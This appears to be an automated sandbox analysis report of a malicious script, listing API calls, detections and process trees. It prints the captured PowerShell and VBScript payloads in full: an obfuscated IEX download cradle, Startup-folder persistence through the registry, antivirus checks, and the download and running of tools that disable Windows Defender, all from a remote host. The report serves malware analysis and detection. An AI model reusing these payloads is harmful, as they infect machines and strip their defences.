ShellExecuteExW April 29, 2021, 9:17 a.m.	show_type: 0 filepath_r: Powershell parameters: $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://firas.alifares.org/jihad/3.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')\|I`E`X filepath: Powershell	1	1	0
ShellExecuteExW April 29, 2021, 9:25 a.m.	show_type: 0 filepath_r: powershell parameters: -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1 filepath: powershell	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses April 29, 2021, 9:24 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

Data received	HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: text/plain Last-Modified: Tue, 20 Apr 2021 08:55:03 GMT Accept-Ranges: bytes Content-Length: 3751 Date: Thu, 29 Apr 2021 00:25:18 GMT Server: LiteSpeed [system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"ra"+"mDa"+"t"+"a\Micr"+"oso"+"f"+"t A"+"rts"+"\S"+"ta"+"rt\") start-sleep -s 5 Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start"; start-sleep -s 5 Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start"; Function aloshy { if([System.IO.File]::Exists("C:\Program Files\Avast Software\Avast\AvastUI.exe")){ start-sleep -s 10 powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/jihad/2.txt', 'C:\Users\Public\msi.ps1') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }" start-sleep -s 7 Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk" start-sleep -s 3 Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk" } elseif([System.IO.File]::Exists("C:\Program Files\ESET\ESET Security\ecmds.exe")){ powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/jihad/2.txt', 'C:\Users\Public\msi.ps1') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }" start-sleep -s 7 Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk" start-sleep -s 3 Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk" } elseif([System.IO.File]::Exists("C:\Program Files\AVG\Antivirus\AVGUI.exe")){ powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/jihad/2.txt', 'C:\Users\Public\msi.ps1') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }" start-sleep -s 7 Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk" start-sleep -s 3 Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk" } else{ $defender = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu") if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('http://firas.alifares.org/defender/11.txt', $defender + '11.ps1')){ } $def = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu") if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('http://firas.alifares.org/defender/ss.vbs', $def + 'ss.vbs')){ } start-sleep -s 25 start "C:\Users\Public\ss.vbs" start-sleep -s 20 powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/jihad/1.txt', 'C:\Users\Public\msi.ps1') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }" start-sleep -s 7 Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk" start-sleep -s 3 Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk" } } IEX aloshy
Data received	HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: text/plain Last-Modified: Sat, 17 Apr 2021 21:41:22 GMT Accept-Ranges: bytes Content-Length: 1078 Date: Thu, 29 Apr 2021 00:25:35 GMT Server: LiteSpeed powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/ff.ps1', 'C:\Users\Public\ff.ps1') }" powershell -ExecutionPolicy Bypass -File C:\Users\Public\ff.ps1 powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/DefenderControl.ini', 'C:\Users\Public\DefenderControl.ini') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/DefenderControl.exe', 'C:\Users\Public\DefenderControl.exe') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/DefenderKill.lnk', 'C:\Users\Public\DefenderKill.lnk') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/Defender.bat', 'C:\Users\Public\Defender.bat') }" powershell -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/kil.ps1', 'C:\Users\Public\kil.ps1') }" powershell -ExecutionPolicy Bypass -File C:\Users\Public\kil.ps1
Data received	HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: text/vbscript Last-Modified: Sat, 17 Apr 2021 21:39:13 GMT Accept-Ranges: bytes Content-Length: 166 Date: Thu, 29 Apr 2021 00:25:35 GMT Server: LiteSpeed Set ccccds = CreateObject ("Wscript.Shell") Dim strArgs strArgs = "powershell -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1" ccccds.Run strArgs, 0, false

Poweshell is sending data to a remote host (3 events)

Data sent	GET /jihad/3.txt HTTP/1.1 Host: firas.alifares.org Connection: Keep-Alive
Data sent	GET /defender/11.txt HTTP/1.1 Host: firas.alifares.org
Data sent	GET /defender/ss.vbs HTTP/1.1 Host: firas.alifares.org

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 29, 2021, 9:24 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 29, 2021, 9:26 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:5292 CREDAT:145409

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Attempts to identify installed AV products by installation directory (2 events)

file	C:\Program Files\Avast Software\Avast\AvastUI.exe
file	C:\Program Files\AVG\Antivirus\AVGUI.exe

Drops a binary and executes it (1 event)

file	C:\Users\Public\ss.vbs

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

MicroWorld-eScan	VB.Heur.Downloader.5.7749D816.Gen
FireEye	VB.Heur.Downloader.5.7749D816.Gen
Arcabit	VB.Heur.Downloader.5.7749D816.Gen
Symantec	ISB.Downloader!gen76
Avast	SNH:Script [Dropper]
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	VB.Heur.Downloader.5.7749D816.Gen
Ad-Aware	VB.Heur.Downloader.5.7749D816.Gen
Emsisoft	VB.Heur.Downloader.5.7749D816.Gen (B)
GData	VB.Heur.Downloader.5.7749D816.Gen
ALYac	VB.Heur.Downloader.5.7749D816.Gen
Rising	Downloader.Agent!8.B23 (TOPIS:E0:59sExVQjAKE)
MAX	malware (ai score=88)
Fortinet	VBS/Agent.VHV!tr.dldr
AVG	SNH:Script [Dropper]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send April 29, 2021, 9:24 a.m.	buffer: GET /jihad/3.txt HTTP/1.1 Host: firas.alifares.org Connection: Keep-Alive socket: 1264 sent: 79	1	79
send April 29, 2021, 9:25 a.m.	buffer: GET /defender/11.txt HTTP/1.1 Host: firas.alifares.org socket: 1264 sent: 59	1	59
send April 29, 2021, 9:25 a.m.	buffer: GET /defender/ss.vbs HTTP/1.1 Host: firas.alifares.org socket: 1264 sent: 59	1	59

One or more non-whitelisted processes were created (7 events)

parent_process	powershell.exe	martian_process	C:\Users\Public\ss.vbs
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& { (New-Object Net.WebClient).DownloadFile('http://firas.alifares.org/defender/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WScript.exe" "C:\Users\Public\ss.vbs"
parent_process	iexplore.exe	martian_process	Powershell $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://firas.alifares.org/jihad/3.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')\|I`E`X
parent_process	iexplore.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://firas.alifares.org/jihad/3.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')\|I`E`X
parent_process	wscript.exe	martian_process	powershell -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Public\11.ps1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 5292 resumed a thread in remote process 3532
NtResumeThread April 29, 2021, 9:17 a.m.	thread_handle: 0x000000000000033c suspend_count: 1 process_identifier: 3532	1	0	0

Creates a suspicious Powershell process (3 events)

value	Uses powershell to execute a file download from the command line
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-executionpolicy bypass	value	Attempts to bypass execution policy

The processes powershell.exe, wscript.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

4.html

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All